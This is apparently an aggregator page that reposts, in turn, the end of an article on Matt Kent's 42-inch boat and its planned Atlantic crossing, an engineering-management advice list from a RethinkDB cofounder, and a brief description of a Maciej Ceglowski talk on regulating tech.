“My diet consists of nuts, dried fruit, protein powder, nutrition bars, a variety of soups, stews, pasta, peanut butter, Nutella and so on. I have a huge variety as well as 64,000 extra calories in the form of two gallons of olive oil to add to my food.

“None of my food needs cooking but I do have a 12V/120W heat coil wand to heat water for dinner or tea or coffee, if I can afford the power. With a two-minute boil time I should be able to use it often. All of this fits in the bilge and down the keel.”

Rather than carry a liferaft, Undaunted has its own emergency flotation system. “I had a white-water raft company make three inflatable tubes that will be rolled up and attached to the port, starboard, and bow of my boat. If I get swamped, holed or have an emergency I can turn a valve from inside the boat to have CO2 fill the tubes and float the boat until I fix it, or pump out,” explains Kent.

Undaunted has no engine, so the watermaker and battery charger will be operated by hand and foot pumps.

“I have two 1.2-gallon manual reverse-osmosis desalinators. One would be more than enough, but water is nothing to mess with.

“I will also have one month’s worth of water on board and one month of food that doesn’t need to be rehydrated if the watermakers fail or if I am injured and can’t pump. Making water and electricity will be part of my daily exercise.

“Also I will be able to swim behind the boat with a dual tether and harness system.”

The keel fresh water tank is divided into four ten-gallon compartments to avoid loss of stability in the event that Kent uses the water. Each can then be separately refilled with seawater.

Permission to land

When Vilhen crossed the Atlantic in 1993 in his 5ft 4in Father’s Day, his original plans were thwarted by the US Coast Guard and he eventually departed from Canada. Kent says this was one of the drivers in choosing a west-about route.

“Not only is the thought of coming home better than showing up someplace else after a long voyage alone, but it means that by the time I am in US waters I will have just crossed 4,600 miles of open ocean.

“If I can, I will pull into port, raise my Q flag and wait for Customs there. If I am near shore and I become too much of a traffic hazard, we will have a small boat come retrieve me.

“We are trying to make sure we don’t get in the way of other people’s livelihood or put anyone at risk with a needless rescue operation.”

His safety equipment includes AIS and an EPIRB.

“I have a satellite phone and a shore support team watching weather and my progress, giving me daily weather reports and receiving my location and status updates directly. I will also be tracked by my AIS system.

“I have a standalone GPS, GPS on my radio, GPS on my sat phone and on my smartphone and chartplotter, as well as redundant clocks and a sextant, and paper charts of the Caribbean and mid-North Atlantic.”

Kent says he is unconcerned about the psychological challenge of living in such a small space for four months.

“I have spent weeks alone in the Guatemalan Highlands, and lived alone in the woods for years. I have never been so alone or for so long, but few have.

“With plenty of digital media, books, daily check-ins and phone calls on the sat phone I will hardly be alone. Meditation has been a big part of my life, so the loneliness of the trip is not my biggest concern.”

Specifications

Length: 1m (42in)
Draught: 1.5m (60in)
Weight: 544kg unladen (1,200lb), or 816kg laden (1,800lb)
Hull Speed: 2.5 knots
Sail area: 49.5sq ft (square sail) plus 27sq ft (rafee)

Undaunted has a modified square rig. “I have three identical yards and two sails, one square and one rafee [triangular topsail set above] a lower yard. One will be inside the cabin while the other is set.”

The boat has two watertight hatches: a small one set into the large one. The large hatch opens and locks over the back of the boat to act as a work table and guard against getting pooped. The small hatch has a lookout dome and is just big enough to allow Kent to get in and out.

Two 16-gallon polyethylene tanks or ‘saddle-bags’ are lashed to either side of the boat under a 4in port. They will hold lighter supplies like clothes and extra line, says Kent. “They are also reserve flotation in the event of flooding.”

The rudders are attached to the transom by two 4in piano hinges. Attached to that rack is a third tiller that travels through the transom inside a rubber boot to keep it watertight for steering from inside the vessel. There is no autopilot or wind vane self-steering.

Two roll-up solar panels can be deployed or stored down below.

The keel incorporates a 40-gallon water tank.

A large waterproof case houses all electronics, bolted to the port bulkhead. This includes breakers attached to the 105 amp-hour battery in the bilge.

You can learn more about Undaunted and Matt Kent’s Atlantic crossing on his Facebook page Little Boat Project or the website littleboatproject.org

↧

44 engineering management lessons

May 19, 2017, 11:10 pm

≫ Next: Ceglowski: Notes from an Emergency (time to regulate tech)

≪ Previous: 42-inch yacht still hoping to become the smallest boat to cross the Atlantic

I am a cofounder of RethinkDB— an open-source distributed database designed to help developers and operations teams work with unstructured data to build real-time applications.

03 Oct 2014

Welcome to engineering management. It’s fun, it’s exhausting, it’s rewarding — but most importantly it’s new! What worked for you before won’t work now. You’ll have to acquire a new set of skills, and shed some bad habits in the process. Here is a short guide to get you started.

Do

Attract, nurture, coach, and retain talent. Talk to engineers to tease out concerns early, then fix them if you can.
Communicate to every engineer the next most important issue for them to work on.
Be the tiebreaker when the development team can’t reach consensus.
Be the information hub. Know what every engineer is working on, and help connect the dots that wouldn’t otherwise get connected.
Provide administrative support. Schedule issues, coordinate releases, and make sure the bureaucratic machine keeps ticking.
Enforce behavioral and performance standards. Fire bullies and underperformers.

Don’t

Personally fix bugs and ship features. You have to write code to remain an effective tiebreaker, but that’s where your coding responsibilities end.
Supervise the quality and volume of people’s work. Software engineering isn’t an assembly line. If you find yourself supervising too often, you haven’t attracted the right people or given them the right incentives.

Motivation and culture

You’re the one who makes hiring and firing decisions. Everything that happens on your team is your responsibility.
Engineering is a seller’s market: people work for you because they believe in you. Access to their talent is a privilege.
Authority isn’t bestowed freely. It’s earned by making good decisions over time.
Don’t make decisions unless you have to. Whenever possible, allow the team to explore ideas and make decisions on its own.
Do make decisions when it’s necessary. Few things are as demoralizing as a stalled team.
Don’t shoot down ideas until it’s necessary. Create an environment where everyone feels safe to share and explore ideas. The folks writing the code have a lot of information you don’t. Rely on your team and you’ll make better decisions.
Building intuition on how to make good decisions and cultivating a great relationship with your team will get you 95% of the way there. The plethora of conceptual frameworks for organizing engineering teams won’t make much difference. They make good managers slightly better and bad managers slightly worse.

Emotions and people

Management happens to be prestigious in our culture, but it’s a skill like any other. Prestige is a distraction — it’s fickle and arbitrary. Guard against believing you’re any better than anyone else. The sooner you get over prestige, the sooner you can focus on doing your job well.
Management also attracts scorn. Ignore it — the people who believe managers are useless don’t understand the dynamics of building a winning human organization.
If you feel something’s wrong, you’re probably right. Don’t let anyone bully you into ignoring your feelings.
If you find yourself blaming someone, you’re probably wrong. Nobody wakes up and tries to do a bad job. 95% of the time you can resolve your feelings by just talking to people.
Most people won’t easily share their emotions. Have frequent informal conversations, and tease out everything that might be wrong. Then fix it if you can.
Your team looks to you for leadership. Have the courage to say what everyone knows to be true but isn’t saying.
You’re paid to discover and fix cultural problems your team may not be aware of. Have the courage to say what everyone should know but doesn’t.
Hire great people, then trust them completely. Evaluate performance on monthly or quarterly basis, then fire if you have to. Don’t evaluate people daily, it will drive everyone (including you) insane.
Most intellectual arguments have strong emotional undercurrents. You’ll be dramatically more efficient once you learn to figure out what those are.

Tiebreaking and conflict

Don’t judge too quickly; you’re right less often than you think. Even if you’re sure you’re right in any given case, wait until everyone’s opinion is heard.
Once everyone is heard, summarize all points of view so clearly that people say “Thanks, I wish I’d thought of putting it that way.” List any points of agreement with each view, and state what you’ve learned from everyone. Then make your decision.
Once you’ve made your decision, enforce it. Don’t let the team waste time going in circles to placate disproportionally strong voices.
Reopen the discussion if there is significant new information.
When disagreement gets personal or people don’t accept well-reasoned decisions, it turns into conflict.
Most conflict happens because people don’t feel heard. Sit down with each person and ask them how they feel. Listen carefully. Then ask again. And again. Then summarize what they said back to them. Most of the time that will solve the problem.
If the conflict persists after you’ve gone to reasonable lengths to hear everyone out and fix problems, it’s time for a difficult conversation.

Difficult conversations

Have difficult conversations as soon as possible. Waiting will only make a bad situation worse.
Never assume or jump to conclusions. Never demonize people in your mind. Never blame, yell or vilify.
Use non-violent communication— it’s the best method I know of to critique people’s behavior without offending them. It smells like a management fad, but it really works (I promise).
Have the courage to state how you feel and what you need. People are drawn to each other’s vulnerability but repelled by their own. Vulnerability isn’t weakness.
Expect people to extend you the same courtesy. If someone makes you feel bad for stating your needs and feelings, it tells you more about them than about yourself.

Rough edge

People will push and prod to discover your boundaries. Knowing when to stand back and when to stand firm is half the battle.
Occasionally someone will push too far. When they do, you have to show a rough edge or you’ll lose authority with your team.
A firm “I’m not ok with that” is usually enough.
Don’t laugh things off if you don’t feel like laughing them off. Have the courage to show your true emotions.
If you have to firmly say “I’m not ok with that” too many times to the same person, it’s your job to fire them.
Unless you’re a sociopath, firing people is so hard you’ll invent excuses not to do it. If you’re consistently wondering if someone’s a good fit for too long, have the courage to do what you know is right.
Don’t let people pressure you into decisions you don’t believe in. They’ll hold you responsible for them later, and they’ll be right. Decisions are your responsibility.
Believe in yourself. You can’t lead a cavalry charge if you think you look funny on a horse.

Thanks to Michael Glukhovsky, Michael Lucy, and Alex Taussig for reviewing this post.

↧

Ceglowski: Notes from an Emergency (time to regulate tech)

May 20, 2017, 9:04 am

≫ Next: Frighteningly Ambitious Startup Ideas (2012)

≪ Previous: 44 engineering management lessons

Offentliggjort den 16. maj 2017

Find out more at: https://re-publica.com/en/17/session/...

The Trump administration and the political movement it represents pose a unique challenge to the tech industry, which is mostly based in the United States and controls enormous amounts of sensitive data on entire populations.

Maciej Ceglowski
http://pinboard.in
https://twitter.com/pinboard

Creative Commons Attribution-ShareAlike 3.0 Germany
(CC BY-SA 3.0 DE)